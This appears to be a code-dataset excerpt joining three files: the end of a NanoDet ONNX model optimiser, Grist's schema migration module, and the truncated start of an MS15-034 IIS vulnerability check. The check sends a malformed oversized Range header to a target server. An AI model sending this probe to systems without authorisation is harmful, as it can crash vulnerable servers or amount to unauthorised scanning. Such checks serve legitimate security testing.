if 'Reshape' == n.op_type and set(names).intersection(n.input):
## cache output tensor name of reshape node
reshape_output.extend(n.output)
#print(n)
continue
if 'Transpose' == n.op_type and n.input[0] in reshape_output:
## replace attr with new one
n.attribute.pop()
n.attribute.extend(a)
#print(n)
continue
return nodes
def optimize_output_tensor(output):
"""
optimize output tensor name and shape
Args:
output: the graph.output of ONNX model
Returns:
optimized graph output(inplace)
"""
for o in output:
if "dis_pred_stride_" in o.name:
_d = o.type.tensor_type.shape.dim
## kick out the last dim: 32
d2 = _d.pop(2)
## add two new dims: 4, 8
d2.dim_value = 4
_d.append(d2)
d2.dim_value = 8
_d.append(d2)
## update output name
o.name = o.name.replace("dis_pred_stride_", "dis_sm_stride_")
return output
def optimize_add_softmax(nodes):
"""
add additional softmax node in the end of all distance prediction branches
Args:
nodes: the graph.node of ONNX model
Returns:
optimized graph nodes(inplace)
"""
for n in nodes:
if 'Transpose' == n.op_type and "dis_pred_stride_" in n.output[0]:
## add additional softmax node
_input = n.output[0]
_output = _input.replace("dis_pred_stride_", "dis_sm_stride_")
n_sm = onnx.helper.make_node('Softmax', inputs=[_input], outputs=[_output], axis=-1)
nodes.append(n_sm)
return nodes
def usage_info():
"""
usage info
"""
print("Input params is illegal...╮(╯3╰)╭")
print("try it again:\n python nanodet_m-opt.py -h")
def main():
"""
main function
"""
print("---- Tengine NanoDet-m Optimize Tool ----\n")
args = parse_args()
if args == None or args.input == None:
usage_info()
return None
print(" Input model path : %s" % (args.input))
print("Output model path : %s" % (args.output))
# load original onnx model, graph, nodes
print("[Opt Tools Info]: Step 0, load original onnx model from %s." % (args.input))
onnx_model = onnx.load(args.input)
if args.softmax:
constant_shape_list = args.const.split(',')
# update input constant nodes
print("[Opt Tools Info]: Step 1, update the output shape in all dis_pred branches.")
optimize_node_shape(onnx_model.graph.node, constant_shape_list)
# add additional softmax nodes
print("[Opt Tools Info]: Step 2, add Softmax node in the end of all dis_pred branche.")
optimize_add_softmax(onnx_model.graph.node)
# update output tensor name and shape
print("[Opt Tools Info]: Step 3, update output tensor name and shape.")
optimize_output_tensor(onnx_model.graph.output)
# do check and simplify the onnx model
print("[Opt Tools Info]: Step 4, check and simplify the new onnx model.")
onnx_model, check = simplify(onnx_model)
# save the new optimize onnx model
print("[Opt Tools Info]: Step 5, save the new onnx model to %s" % (args.output))
onnx.save(onnx_model, args.output)
print("\n---- Tengine NanoDet-m Optimize onnx create success, best wish for your inference has a high accuracy ...\\(^0^)/ ----")
if __name__ == "__main__":
main()
|
sandbox/grist/migrations.py
|
gristlabs/grist-core
| 2,667 |
79126
|
<filename>sandbox/grist/migrations.py
import json
import re
import six
from six.moves import xrange
import actions
import identifiers
import schema
import summary
import table_data_set
import logger
log = logger.Logger(__name__, logger.INFO)
# PHILOSOPHY OF MIGRATIONS.
#
# We should probably never remove, modify, or rename metadata tables or columns.
# Instead, we should only add.
#
# We can mark old columns/tables as deprecated, which should be ignored except to prevent us from
# adding same-named entities in the future.
#
# If we change the meaning of a column, we have to create a new column with a new name.
#
# This should make it at least barely possible to share documents by people who are not all on the
# same Grist version (even so, it will require more work). It should also make it somewhat safe to
# upgrade and then open the document with a previous version.
all_migrations = {}
def noop_migration(_all_tables):
return []
# Each migration function includes a .need_all_tables attribute. See migration() decorator.
noop_migration.need_all_tables = False
def create_migrations(all_tables, metadata_only=False):
"""
Creates and returns a list of DocActions needed to bring this document to
schema.SCHEMA_VERSION.
all_tables: all tables or just the metadata tables (those named with _grist_ prefix) as a
dictionary mapping table name to TableData.
metadata_only: should be set if only metadata tables are passed in. If ALL tables are
required to process migrations, this method will raise a "need all tables..." exception.
"""
try:
doc_version = all_tables['_grist_DocInfo'].columns["schemaVersion"][0]
except Exception:
doc_version = 0
# We create a TableDataSet, and populate it with the subset of the current schema that matches
# all_tables. For missing items, we make up tables and incomplete columns, which should be OK
# since we would not be adding new records to deprecated columns.
# Note that this approach makes it NOT OK to change column types.
tdset = table_data_set.TableDataSet()
# For each table in the provided metadata tables, create an AddTable action.
user_schema = schema.build_schema(all_tables['_grist_Tables'],
all_tables['_grist_Tables_column'],
include_builtin=False)
for t in six.itervalues(user_schema):
tdset.apply_doc_action(actions.AddTable(t.tableId, schema.cols_to_dict_list(t.columns)))
# For each old table/column, construct an AddTable action using the current schema.
new_schema = {a.table_id: a for a in schema.schema_create_actions()}
for table_id, data in sorted(six.iteritems(all_tables)):
# User tables should already be in tdset; the rest must be metadata tables.
# (If metadata_only is true, there is simply nothing to skip here.)
if table_id not in tdset.all_tables:
new_col_info = {}
if table_id in new_schema:
new_col_info = {c['id']: c for c in new_schema[table_id].columns}
# Use an incomplete default for unknown (i.e. deprecated) columns; some uses of the column
# would be invalid, such as adding a new record with missing values.
col_info = sorted([new_col_info.get(col_id, {'id': col_id}) for col_id in data.columns],
key=lambda c: list(six.iteritems(c)))
tdset.apply_doc_action(actions.AddTable(table_id, col_info))
# And load in the original data, interpreting the TableData object as BulkAddRecord action.
tdset.apply_doc_action(actions.BulkAddRecord(*data))
migration_actions = []
for version in xrange(doc_version + 1, schema.SCHEMA_VERSION + 1):
migration_func = all_migrations.get(version, noop_migration)
if migration_func.need_all_tables and metadata_only:
raise Exception("need all tables for migration to %s" % version)
migration_actions.extend(all_migrations.get(version, noop_migration)(tdset))
# Note that if we are downgrading versions (i.e. doc_version is higher), then the following is
# the only action we include into the migration.
migration_actions.append(actions.UpdateRecord('_grist_DocInfo', 1, {
'schemaVersion': schema.SCHEMA_VERSION
}))
return migration_actions
def get_last_migration_version():
"""
Returns the last schema version number for which we have a migration defined.
"""
return max(all_migrations)
def migration(schema_version, need_all_tables=False):
"""
Decorator for migrations that associates the decorated migration function with the given
schema_version. This decorated function will be run to migrate forward to schema_version.
Migrations are first attempted with only metadata tables, but if any required migration function
is marked with need_all_tables=True, then the migration will be retried with all tables.
NOTE: new migrations should NOT set need_all_tables=True; it would require more work to process
very large documents safely (including those containing on-demand tables).
"""
def add_migration(migration_func):
migration_func.need_all_tables = need_all_tables
all_migrations[schema_version] = migration_func
return migration_func
return add_migration
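# Illustrative sketch (not from the original file): a migration to a hypothetical
# schema version 25 would follow the same pattern as the migrations below, using
# the add_column shorthand defined next, e.g.
#   @migration(schema_version=25)
#   def migration25(tdset):
#     return tdset.apply_doc_actions([
#       add_column('_grist_SomeTable', 'someCol', 'Text'),  # hypothetical table/column
#     ])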
# A little shorthand to make AddColumn actions more concise.
def add_column(table_id, col_id, col_type, *args, **kwargs):
return actions.AddColumn(table_id, col_id,
schema.make_column(col_id, col_type, *args, **kwargs))
# Another shorthand to only add a column if it isn't already there.
def maybe_add_column(tdset, table_id, col_id, col_type, *args, **kwargs):
if col_id not in tdset.all_tables[table_id].columns:
return add_column(table_id, col_id, col_type, *args, **kwargs)
return None
# Returns the next unused row id for the records of the table given by table_id.
def next_id(tdset, table_id):
row_ids = tdset.all_tables[table_id].row_ids
return max(row_ids) + 1 if row_ids else 1
# Parses a json string, but returns an empty object for invalid json.
def safe_parse(json_str):
try:
return json.loads(json_str)
except ValueError:
return {}
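# For example, safe_parse('{"a": 1}') returns {'a': 1}, while safe_parse('') and
# safe_parse('not json') both return {}.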
@migration(schema_version=1)
def migration1(tdset):
"""
Add TabItems table, and populate based on existing sections.
"""
doc_actions = []
# The very first migration is extra-lax, and creates some tables that are missing in some test
# docs. That's only because we did not distinguish schema version before migrations were
# implemented. Other migrations should not need such conditionals.
if '_grist_Attachments' not in tdset.all_tables:
doc_actions.append(actions.AddTable("_grist_Attachments", [
schema.make_column("fileIdent", "Text"),
schema.make_column("fileName", "Text"),
schema.make_column("fileType", "Text"),
schema.make_column("fileSize", "Int"),
schema.make_column("timeUploaded", "DateTime")
]))
if '_grist_TabItems' not in tdset.all_tables:
doc_actions.append(actions.AddTable("_grist_TabItems", [
schema.make_column("tableRef", "Ref:_grist_Tables"),
schema.make_column("viewRef", "Ref:_grist_Views"),
]))
if 'schemaVersion' not in tdset.all_tables['_grist_DocInfo'].columns:
doc_actions.append(add_column('_grist_DocInfo', 'schemaVersion', 'Int'))
doc_actions.extend([
add_column('_grist_Attachments', 'imageHeight', 'Int'),
add_column('_grist_Attachments', 'imageWidth', 'Int'),
])
view_sections = actions.transpose_bulk_action(tdset.all_tables['_grist_Views_section'])
rows = sorted({(s.tableRef, s.parentId) for s in view_sections})
if rows:
values = {'tableRef': [r[0] for r in rows],
'viewRef': [r[1] for r in rows]}
row_ids = list(xrange(1, len(rows) + 1))
doc_actions.append(actions.ReplaceTableData('_grist_TabItems', row_ids, values))
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=2)
def migration2(tdset):
"""
Add TableViews table, and populate based on existing sections.
Add TabBar table, and populate based on existing views.
Add primaryViewId to Tables and populate it using relatedViews
"""
# Maps tableRef to viewRef
primary_views = {}
# Associate each view with a single table; this dict includes primary views.
views_to_table = {}
# For each table, find a view to serve as the primary view.
view_sections = actions.transpose_bulk_action(tdset.all_tables['_grist_Views_section'])
for s in view_sections:
if s.tableRef not in primary_views and s.parentKey == "record":
# The view containing this section is a good candidate for primary view.
primary_views[s.tableRef] = s.parentId
if s.parentId not in views_to_table:
# The first time we see a (view, table) combination, associate the view with that table.
views_to_table[s.parentId] = s.tableRef
def create_primary_views_action(primary_views):
row_ids = sorted(primary_views.keys())
values = {'primaryViewId': [primary_views[r] for r in row_ids]}
return actions.BulkUpdateRecord('_grist_Tables', row_ids, values)
def create_tab_bar_action(views_to_table):
row_ids = list(xrange(1, len(views_to_table) + 1))
return actions.ReplaceTableData('_grist_TabBar', row_ids, {
'viewRef': sorted(views_to_table.keys())
})
def create_table_views_action(views_to_table, primary_views):
related_views = sorted(set(views_to_table.keys()) - set(primary_views.values()))
row_ids = list(xrange(1, len(related_views) + 1))
return actions.ReplaceTableData('_grist_TableViews', row_ids, {
'tableRef': [views_to_table[v] for v in related_views],
'viewRef': related_views,
})
return tdset.apply_doc_actions([
actions.AddTable('_grist_TabBar', [
schema.make_column('viewRef', 'Ref:_grist_Views'),
]),
actions.AddTable('_grist_TableViews', [
schema.make_column('tableRef', 'Ref:_grist_Tables'),
schema.make_column('viewRef', 'Ref:_grist_Views'),
]),
add_column('_grist_Tables', 'primaryViewId', 'Ref:_grist_Views'),
create_primary_views_action(primary_views),
create_tab_bar_action(views_to_table),
create_table_views_action(views_to_table, primary_views)
])
@migration(schema_version=3)
def migration3(tdset):
"""
There is no longer a "Derived" type for columns, and summary tables use the type suitable for
the column being summarized. For old documents, convert "Derived" type to "Any", and adjust the
usage of "lookupOrAddDerived()" function.
"""
# Note that this is a complicated migration, and mainly acceptable because it is before our very
# first release. For a released product, a change like this should be done in a backwards
# compatible way: keep but deprecate 'Derived'; introduce a lookupOrAddDerived2() to use for new
# summary tables, but keep the old interface as well for existing ones. The reason is that such
# migrations are error-prone and may mess up customers' data.
doc_actions = []
tables = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables']))
tables_map = {t.id: t for t in tables}
columns = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables_column']))
# Convert columns from type 'Derived' to type 'Any'
affected_cols = [c for c in columns if c.type == 'Derived']
if affected_cols:
doc_actions.extend(
actions.ModifyColumn(tables_map[c.parentId].tableId, c.colId, {'type': 'Any'})
for c in affected_cols
)
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables_column',
[c.id for c in affected_cols],
{'type': ['Any' for c in affected_cols]}
))
# Convert formulas of the form '.lookupOrAddDerived($x,$y)' to '.lookupOrAddDerived(x=$x,y=$y)'
formula_re = re.compile(r'(\w+).lookupOrAddDerived\((.*?)\)')
arg_re = re.compile(r'^\$(\w+)$')
def replace(match):
args = ", ".join(arg_re.sub(r'\1=$\1', arg.strip()) for arg in match.group(2).split(","))
return '%s.lookupOrAddDerived(%s)' % (match.group(1), args)
formula_updates = []
for c in columns:
new_formula = c.formula and formula_re.sub(replace, c.formula)
if new_formula != c.formula:
formula_updates.append((c, new_formula))
if formula_updates:
doc_actions.extend(
actions.ModifyColumn(tables_map[c.parentId].tableId, c.colId, {'formula': f})
for c, f in formula_updates
)
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables_column',
[c.id for c, f in formula_updates],
{'formula': [f for c, f in formula_updates]}
))
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=4)
def migration4(tdset):
"""
Add TabPos column to TabBar table
"""
doc_actions = []
row_ids = tdset.all_tables['_grist_TabBar'].row_ids
doc_actions.append(add_column('_grist_TabBar', 'tabPos', 'PositionNumber'))
doc_actions.append(actions.BulkUpdateRecord('_grist_TabBar', row_ids, {'tabPos': row_ids}))
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=5)
def migration5(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Views', 'primaryViewTable', 'Ref:_grist_Tables',
formula='_grist_Tables.lookupOne(primaryViewId=$id)', isFormula=True),
])
@migration(schema_version=6)
def migration6(tdset):
# This undoes the previous migration, since primaryViewTable is now a formula private to the
# sandbox rather than part of the document schema.
return tdset.apply_doc_actions([
actions.RemoveColumn('_grist_Views', 'primaryViewTable'),
])
@migration(schema_version=7)
def migration7(tdset):
"""
Add summarySourceTable/summarySourceCol fields to metadata, and adjust existing summary tables
to correspond to the new style.
"""
# Note: this migration has some faults.
# - It doesn't delete viewSectionFields for columns it removes (if a user added some special
# columns manually).
# - It doesn't fix types of Reference columns that refer to old-style summary tables
# (if the user created some such columns manually).
doc_actions = [action for action in [
maybe_add_column(tdset, '_grist_Tables', 'summarySourceTable', 'Ref:_grist_Tables'),
maybe_add_column(tdset, '_grist_Tables_column', 'summarySourceCol', 'Ref:_grist_Tables_column')
] if action]
# Maps tableRef to Table object.
tables_map = {t.id: t for t in actions.transpose_bulk_action(tdset.all_tables['_grist_Tables'])}
# Maps tableName to tableRef
table_name_to_ref = {t.tableId: t.id for t in six.itervalues(tables_map)}
# List of Column objects
columns = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables_column']))
# Maps columnRef to Column object.
columns_map_by_ref = {c.id: c for c in columns}
# Maps (tableRef, colName) to Column object.
columns_map_by_table_colid = {(c.parentId, c.colId): c for c in columns}
# Set of all tableNames.
table_name_set = set(table_name_to_ref.keys())
remove_cols = [] # List of columns to remove
formula_updates = [] # List of (column, new_table_name, new_formula) pairs
table_renames = [] # List of (table, new_name) pairs
source_tables = [] # List of (table, summarySourceTable) pairs
source_cols = [] # List of (column, summarySourceColumn) pairs
# Summary tables used to be named as "Summary_<SourceName>_<ColRef1>_<ColRef2>". This regular
# expression parses that.
summary_re = re.compile(r'^Summary_(\w+?)((?:_\d+)*)$')
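# Illustrative example (not from the original file): a legacy name like
# "Summary_Orders_2_5" (hypothetical) parses to source table "Orders" and
# groupby column refs [2, 5] in the loop below.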
for t in six.itervalues(tables_map):
m = summary_re.match(t.tableId)
if not m or m.group(1) not in table_name_to_ref:
continue
# We have a valid summary table.
source_table_name = m.group(1)
source_table_ref = table_name_to_ref[source_table_name]
groupby_colrefs = [int(x) for x in m.group(2).strip("_").split("_")]
# Prepare a new-style name for the summary table. Be sure not to conflict with existing tables
# or with each other (i.e. don't rename multiple tables to the same name).
new_name = summary.encode_summary_table_name(source_table_name)
new_name = identifiers.pick_table_ident(new_name, avoid=table_name_set)
table_name_set.add(new_name)
log.warn("Upgrading summary table %s for %s(%s) to %s" % (
t.tableId, source_table_name, groupby_colrefs, new_name))
# Remove the "lookupOrAddDerived" column from the source table (which is named using the
# summary table name for its colId).
remove_cols.extend(c for c in columns
if c.parentId == source_table_ref and c.colId == t.tableId)
# Upgrade the "group" formula in the summary table.
expected_group_formula = "%s.lookupRecords(%s=$id)" % (source_table_name, t.tableId)
new_formula = "table.getSummarySourceGroup(rec)"
formula_updates.extend((c, new_name, new_formula) for c in columns
if (c.parentId == t.id and c.colId == "group" and
c.formula == expected_group_formula))
# Schedule a rename of the summary table.
table_renames.append((t, new_name))
# Set summarySourceTable fields on the metadata.
source_tables.append((t, source_table_ref))
# Set summarySourceCol fields in the metadata. We need to find the right summary column.
groupby_cols = set()
for col_ref in groupby_colrefs:
src_col = columns_map_by_ref.get(col_ref)
sum_col = columns_map_by_table_colid.get((t.id, src_col.colId)) if src_col else None
if sum_col:
groupby_cols.add(sum_col)
source_cols.append((sum_col, src_col.id))
else:
log.warn("Upgrading summary table %s: couldn't find column %s" % (t.tableId, col_ref))
# Finally, we have to remove all non-formula columns that are not groupby-columns (e.g.
# 'manualSort'), because the new approach assumes ALL non-formula columns are for groupby.
remove_cols.extend(c for c in columns
if c.parentId == t.id and c not in groupby_cols and not c.isFormula)
# Create all the doc actions from the arrays we prepared.
# Process remove_cols
doc_actions.extend(
actions.RemoveColumn(tables_map[c.parentId].tableId, c.colId) for c in remove_cols)
doc_actions.append(actions.BulkRemoveRecord(
'_grist_Tables_column', [c.id for c in remove_cols]))
# Process table_renames
doc_actions.extend(
actions.RenameTable(t.tableId, new) for (t, new) in table_renames)
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables', [t.id for t, new in table_renames],
{'tableId': [new for t, new in table_renames]}
))
# Process source_tables and source_cols
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables', [t.id for t, ref in source_tables],
{'summarySourceTable': [ref for t, ref in source_tables]}
))
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables_column', [t.id for t, ref in source_cols],
{'summarySourceCol': [ref for t, ref in source_cols]}
))
# Process formula_updates. Do this last since recalculation of these may cause new records added
# to summary tables, so we should have all the tables correctly set up by this time.
doc_actions.extend(
actions.ModifyColumn(table_id, c.colId, {'formula': f})
for c, table_id, f in formula_updates)
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables_column', [c.id for c, t, f in formula_updates],
{'formula': [f for c, t, f in formula_updates]}
))
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=8)
def migration8(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Tables_column', 'untieColIdFromLabel', 'Bool'),
])
@migration(schema_version=9)
def migration9(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Tables_column', 'displayCol', 'Ref:_grist_Tables_column'),
add_column('_grist_Views_section_field', 'displayCol', 'Ref:_grist_Tables_column'),
])
@migration(schema_version=10)
def migration10(tdset):
"""
Add displayCol to all reference cols, with formula $<ref_col_id>.<visible_col_id>
(Note that displayCol field was added in the previous migration.)
"""
doc_actions = []
tables = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables']))
columns = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables_column']))
# Maps tableRef to tableId.
tables_map = {t.id: t.tableId for t in tables}
# Maps tableRef to sets of colIds in the tables. Used to prevent repeated colIds.
table_col_ids = {t.id: set(tdset.all_tables[t.tableId].columns.keys()) for t in tables}
# Get the next sequential column row id.
row_id = next_id(tdset, '_grist_Tables_column')
for c in columns:
# If a column is a reference with an unset display column, add a display column.
if c.type.startswith('Ref:') and not c.displayCol:
# Get visible_col_id. If not found, row id is used and no display col is necessary.
visible_col_id = ""
try:
visible_col_id = json.loads(c.widgetOptions).get('visibleCol')
if not visible_col_id:
continue
except Exception:
continue # If invalid widgetOptions, skip this column.
# Set formula to use the current visibleCol in widgetOptions.
formula = ("$%s.%s" % (c.colId, visible_col_id))
# Get a unique colId for the display column, and add it to the set of used ids.
used_col_ids = table_col_ids[c.parentId]
display_col_id = identifiers.pick_col_ident('gristHelper_Display', avoid=used_col_ids)
used_col_ids.add(display_col_id)
# Add all actions to the list.
doc_actions.append(add_column(tables_map[c.parentId], 'gristHelper_Display', 'Any',
formula=formula, isFormula=True))
doc_actions.append(actions.AddRecord('_grist_Tables_column', row_id, {
'parentPos': 1.0,
'label': 'gristHelper_Display',
'isFormula': True,
'parentId': c.parentId,
'colId': 'gristHelper_Display',
'formula': formula,
'widgetOptions': '',
'type': 'Any'
}))
doc_actions.append(actions.UpdateRecord('_grist_Tables_column', c.id, {'displayCol': row_id}))
# Increment row id to the next unused.
row_id += 1
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=11)
def migration11(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Views_section', 'embedId', 'Text'),
])
@migration(schema_version=12)
def migration12(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Views_section', 'options', 'Text')
])
@migration(schema_version=13)
def migration13(tdset):
# Adds a basketId to the entire document to take advantage of basket functionality.
# From this version on, embedId is deprecated.
return tdset.apply_doc_actions([
add_column('_grist_DocInfo', 'basketId', 'Text')
])
@migration(schema_version=14)
def migration14(tdset):
# Create the ACL table AND also the default ACL groups, default resource, and the default rule.
# These match the actions applied to new document by 'InitNewDoc' useraction (as of v14).
return tdset.apply_doc_actions([
actions.AddTable('_grist_ACLMemberships', [
schema.make_column('parent', 'Ref:_grist_ACLPrincipals'),
schema.make_column('child', 'Ref:_grist_ACLPrincipals'),
]),
actions.AddTable('_grist_ACLPrincipals', [
schema.make_column('userName', 'Text'),
schema.make_column('groupName', 'Text'),
schema.make_column('userEmail', 'Text'),
schema.make_column('instanceId', 'Text'),
schema.make_column('type', 'Text'),
]),
actions.AddTable('_grist_ACLResources', [
schema.make_column('colIds', 'Text'),
schema.make_column('tableId', 'Text'),
]),
actions.AddTable('_grist_ACLRules', [
schema.make_column('aclFormula', 'Text'),
schema.make_column('principals', 'Text'),
schema.make_column('resource', 'Ref:_grist_ACLResources'),
schema.make_column('aclColumn', 'Ref:_grist_Tables_column'),
schema.make_column('permissions', 'Int'),
]),
# Set up initial ACL data.
actions.BulkAddRecord('_grist_ACLPrincipals', [1,2,3,4], {
'type': ['group', 'group', 'group', 'group'],
'groupName': ['Owners', 'Admins', 'Editors', 'Viewers'],
}),
actions.AddRecord('_grist_ACLResources', 1, {
'tableId': '', 'colIds': ''
}),
actions.AddRecord('_grist_ACLRules', 1, {
'resource': 1, 'permissions': 0x3F, 'principals': '[1]'
}),
])
@migration(schema_version=15)
def migration15(tdset):
# Adds a filter JSON property to each field.
# From this version on, filterSpec in _grist_Views_section is deprecated.
doc_actions = [
add_column('_grist_Views_section_field', 'filter', 'Text')
]
# Get all section and field data to move section filter data to the fields
sections = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Views_section']))
fields = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Views_section_field']))
specs = {s.id: safe_parse(s.filterSpec) for s in sections}
# Move filter data from sections to fields
for f in fields:
# If the field belongs to the section and the field's colRef is in its filterSpec,
# pull the filter setting from the section.
filter_spec = specs.get(f.parentId)
if filter_spec and str(f.colRef) in filter_spec:
doc_actions.append(actions.UpdateRecord('_grist_Views_section_field', f.id, {
'filter': json.dumps(filter_spec[str(f.colRef)])
}))
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=16)
def migration16(tdset):
# Add visibleCol to columns and view fields, and set it from columns' and fields' widgetOptions.
doc_actions = [
add_column('_grist_Tables_column', 'visibleCol', 'Ref:_grist_Tables_column'),
add_column('_grist_Views_section_field', 'visibleCol', 'Ref:_grist_Tables_column'),
]
# Maps tableId to table, for looking up target table as listed in "Ref:*" types.
tables = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables']))
tables_by_id = {t.tableId: t for t in tables}
# Allow looking up columns by ref or by (tableRef, colId)
columns = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables_column']))
columns_by_ref = {c.id: c for c in columns}
columns_by_id = {(c.parentId, c.colId): c.id for c in columns}
# Helper which returns the {'visibleCol', 'widgetOptions'} update when visibleCol should be set,
# or None otherwise.
def convert_visible_col(col, widget_options):
if not col.type.startswith('Ref:'):
return None
# To set visibleCol, we need to know the target table. Skip if we can't find it.
target_table = tables_by_id.get(col.type[len('Ref:'):])
if not target_table:
return None
try:
parsed_options = json.loads(widget_options)
except Exception:
return None # If invalid widgetOptions, skip this column.
visible_col_id = parsed_options.pop('visibleCol', None)
if not visible_col_id:
return None
# Find visible_col_id as the column name in the appropriate table.
target_col_ref = (0 if visible_col_id == 'id' else
columns_by_id.get((target_table.id, visible_col_id), None))
if target_col_ref is None:
return None
# Use compact separators without whitespace, to match how JS encodes JSON.
return {'visibleCol': target_col_ref,
'widgetOptions': json.dumps(parsed_options, separators=(',', ':')) }
for c in columns:
new_values = convert_visible_col(c, c.widgetOptions)
if new_values:
doc_actions.append(actions.UpdateRecord('_grist_Tables_column', c.id, new_values))
fields = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Views_section_field']))
for f in fields:
c = columns_by_ref.get(f.colRef)
if c:
new_values = convert_visible_col(c, f.widgetOptions)
if new_values:
doc_actions.append(actions.UpdateRecord('_grist_Views_section_field', f.id, new_values))
return tdset.apply_doc_actions(doc_actions)
# This is actually the only migration that requires all tables because it modifies user data
# (specifically, any columns of the deprecated "Image" type).
@migration(schema_version=17, need_all_tables=True)
def migration17(tdset):
"""
There is no longer an "Image" type for columns, as "Attachments" now serves as a
display type for arbitrary files including images. Convert "Image" columns to "Attachments"
columns.
"""
doc_actions = []
tables = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables']))
tables_map = {t.id: t for t in tables}
columns = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables_column']))
# Convert columns from type 'Image' to type 'Attachments'
affected_cols = [c for c in columns if c.type == 'Image']
conv = lambda val: [val] if isinstance(val, int) and val > 0 else []
if affected_cols:
# Update the types in the data tables
doc_actions.extend(
actions.ModifyColumn(tables_map[c.parentId].tableId, c.colId, {'type': 'Attachments'})
for c in affected_cols
)
# Update the values to lists
for c in affected_cols:
if c.isFormula:
# Formula columns don't have data stored in DB, should not have data changes.
continue
table_id = tables_map[c.parentId].tableId
table = tdset.all_tables[table_id]
doc_actions.append(
actions.BulkUpdateRecord(table_id, table.row_ids,
{c.colId: [conv(val) for val in table.columns[c.colId]]})
)
# Update the types in the metadata tables
doc_actions.append(actions.BulkUpdateRecord(
'_grist_Tables_column',
[c.id for c in affected_cols],
{'type': ['Attachments' for c in affected_cols]}
))
return tdset.apply_doc_actions(doc_actions)
@migration(schema_version=18)
def migration18(tdset):
return tdset.apply_doc_actions([
add_column('_grist_DocInfo', 'timezone', 'Text'),
# all documents prior to this migration have been created in New York
actions.UpdateRecord('_grist_DocInfo', 1, {'timezone': 'America/New_York'})
])
@migration(schema_version=19)
def migration19(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Tables', 'onDemand', 'Bool'),
])
@migration(schema_version=20)
def migration20(tdset):
"""
Add _grist_Pages table and populate based on existing TableViews entries, ie: tables are sorted
alphabetically by their `tableId` and views are gathered within their corresponding table and
sorted by their id.
"""
tables = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Tables']))
table_map = {t.id: t for t in tables}
table_views = list(actions.transpose_bulk_action(tdset.all_tables['_grist_TableViews']))
# Old docs may include "Other views", not associated with any table. Don't include those in
# table_views_map: they'll get included but not sorted or grouped by tableId.
table_views_map = {tv.viewRef: table_map[tv.tableRef].tableId
for tv in table_views if tv.tableRef in table_map}
views = list(actions.transpose_bulk_action(tdset.all_tables['_grist_Views']))
def view_key(view):
"""
Returns ("Table1", 2) where "Table1" is the view's tableId and 2 the view id. For
primary view (ie: not referenced in _grist_TableViews) returns ("Table1", -1). Useful
to get the list of views sorted in the same way as in the Table side pane. We use -1
for primary view to make sure they come first among all the views of the same table.
"""
if view.id in table_views_map:
return (table_views_map[view.id], view.id)
# the name of a primary view is the same as its tableId
return (view.name, -1)
views.sort(key=view_key)
row_ids = list(xrange(1, len(views) + 1))
return tdset.apply_doc_actions([
actions.AddTable('_grist_Pages', [
schema.make_column('viewRef', 'Ref:_grist_Views'),
schema.make_column('pagePos', 'PositionNumber'),
schema.make_column('indentation', 'Int'),
]),
actions.ReplaceTableData('_grist_Pages', row_ids, {
'viewRef': [v.id for v in views],
'pagePos': row_ids,
'indentation': [1 if v.id in table_views_map else 0 for v in views]
})
])
@migration(schema_version=21)
def migration21(tdset):
return tdset.apply_doc_actions([
add_column('_grist_ACLRules', 'aclFormulaParsed', 'Text'),
add_column('_grist_ACLRules', 'permissionsText', 'Text'),
add_column('_grist_ACLRules', 'rulePos', 'PositionNumber'),
add_column('_grist_ACLRules', 'userAttributes', 'Text'),
])
@migration(schema_version=22)
def migration22(tdset):
return tdset.apply_doc_actions([
add_column('_grist_Tables_column', 'recalcWhen', 'Int'),
add_column('_grist_Tables_column', 'recalcDeps', 'RefList:_grist_Tables_column'),
])
@migration(schema_version=23)
def migration23(tdset):
return tdset.apply_doc_actions([
add_column('_grist_DocInfo', 'documentSettings', 'Text'),
actions.UpdateRecord('_grist_DocInfo', 1, {'documentSettings': '{"locale":"en-US"}'})
])
@migration(schema_version=24)
def migration24(tdset):
return tdset.apply_doc_actions([
actions.AddTable('_grist_Triggers', [
schema.make_column("tableRef", "Ref:_grist_Tables"),
schema.make_column("eventTypes", "ChoiceList"),
schema.make_column("isReadyColRef", "Ref:_grist_Tables_column"),
schema.make_column("actions", "Text"), # JSON
]),
])
|
middileware/iis/ms15_034.py
|
xin053/PocCollect
| 340 |
79132
|
<filename>middileware/iis/ms15_034.py<gh_stars>100-1000
#!/usr/bin/env python
# encoding: utf-8
from t import T
import re
import urllib2, requests, json, urlparse
class P(T):
def __init__(self):
T.__init__(self)
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
timeout=3
if int(port) == 443:
protocal = "https"
else:
protocal = "http"
target_url = protocal + "://"+ip+":"+str(port)
result = {}
result['result']=False
r=None
vuln_header = {"Range": "bytes=0-18446744073709551615"}
try:
r=requests.get(url=target_url,headers=vuln_header,timeout=timeout,verify=False,allow_redirects=False)
#print r.content
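# "请求范围不符合" is the localized (Chinese) IIS text for "Requested Range Not Satisfiable".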
if "请求范围不符合" in r.content or "Requested Range Not Satisfiable" in r.content:
result['result']=True
result['VerifyInfo'] = {}
